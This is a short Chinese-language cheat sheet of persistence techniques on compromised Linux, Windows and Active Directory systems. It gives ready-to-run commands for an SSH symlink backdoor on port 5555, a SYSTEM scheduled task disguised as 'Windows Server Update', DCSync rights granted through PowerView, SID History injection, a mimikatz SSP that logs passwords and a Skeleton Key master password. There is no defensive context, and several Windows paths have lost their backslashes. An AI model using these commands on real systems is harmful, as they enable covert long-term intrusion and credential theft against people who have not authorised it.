Linux权限维持

SSH软连接

1、在/etc/ssh/sshd_config文件中设置UsePAM 为yes。启用PAM认证机制。

对应文件里包含"auth sufficient pam_rootok.so"配置。

使用如下后门简历软连接

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

windows权限维持

1、计划任务—-schtasks

/f 阻止确认消息。不警告就删除任务。
/tn "Windows Server Update" 名称
/tr TaskRun          指定任务运行的程序或命令。
/mo modifier 指定任务在其计划类型内的运行频率。默认 1 次。若 n > 1 则是每 n （单位） 运行一次
/ru 使用指定用户帐户的权限运行任务
/st StartTime
/sc schedule         指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。

schtasks /create /RL HIGHEST /F /tn "Windows Server Update" /tr "C:2.exe" /sc DAILY /mo 1 /ST 09:00 /RU SYSTEM

创建计划任务

名字为(tn)："Windows Server Update"

开始时间(/ST)：09:00

指定运行时间单位(/sc /mo)：某个时间段运行多少次

以某个用户的权限运行：/RU

运行的文件：/tr

/F 强制删除该任务，而且如果指定的任务当前正在运行，则抑制警告。（很重要）

RL表示作业级别，一般设置最高，为HIGHEST

域内权限维持

授予普通用户Dscync权限

1、首先使用普通用户导出域内用户hash

权限不足

2、使用高权限用户授予用户Dscync权限。

Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=com" -PrincipalIdentity gongxinao -Rights DCSync -Verbose

3、导出域内hash-无需提升管理员权限，使用当前域用户即可。

SID权限维持

SID即安全表示符。

SIDHistroy的作用就是在跨域迁移的过程中，保持域用户在之前域的权限。即域用户的sid变了之后，之前的sid会变成sid-histroy。

如果将普通用户的SID History设置为域管理员的sid，那么普通用户可以拥有域管理员的权限。

获取域用户的sid-history

Get-ADUser xiaoli -Properties sidhistory

获取域管理员的sid

Get-ADUser administrator -Properties sidhistory

使用minikazi将域管理员的sid授予域用户xiaoli的sid-histroy。

privilege::debug
sid::patch
sid::add /sam:ming /new:administrator

此时xiaoli这个用户可以直接获取域管理员权限。

获取域中具有sidhistroy属性的用户。

Set-ExecutionPolicy Bypass -Scope Process
. .PowerView.ps1
Get-DomainUser | select sidhistory,cn

SSP权限维持

将恶意dll加载入lsass.exe进程中，会在对应目录下生成文件记录用户密码。

mimikatz privilege::debug
mimikatz misc::memssp
type C:WindowsSystem32mimilsa.log

或者直接修改注册表

copy mimilib.dll %systemroot%system32

reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"

reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos0msv1_00schannel0wdigest0tspkg0pku2u0mimilib" /t REG_MULTI_SZ

Skeleton Key

添加万能密码。

privilege::debug
misc::skeleton

Skeleton Key只是给所有账户添加了一个万能密码，无法修改账户的权限。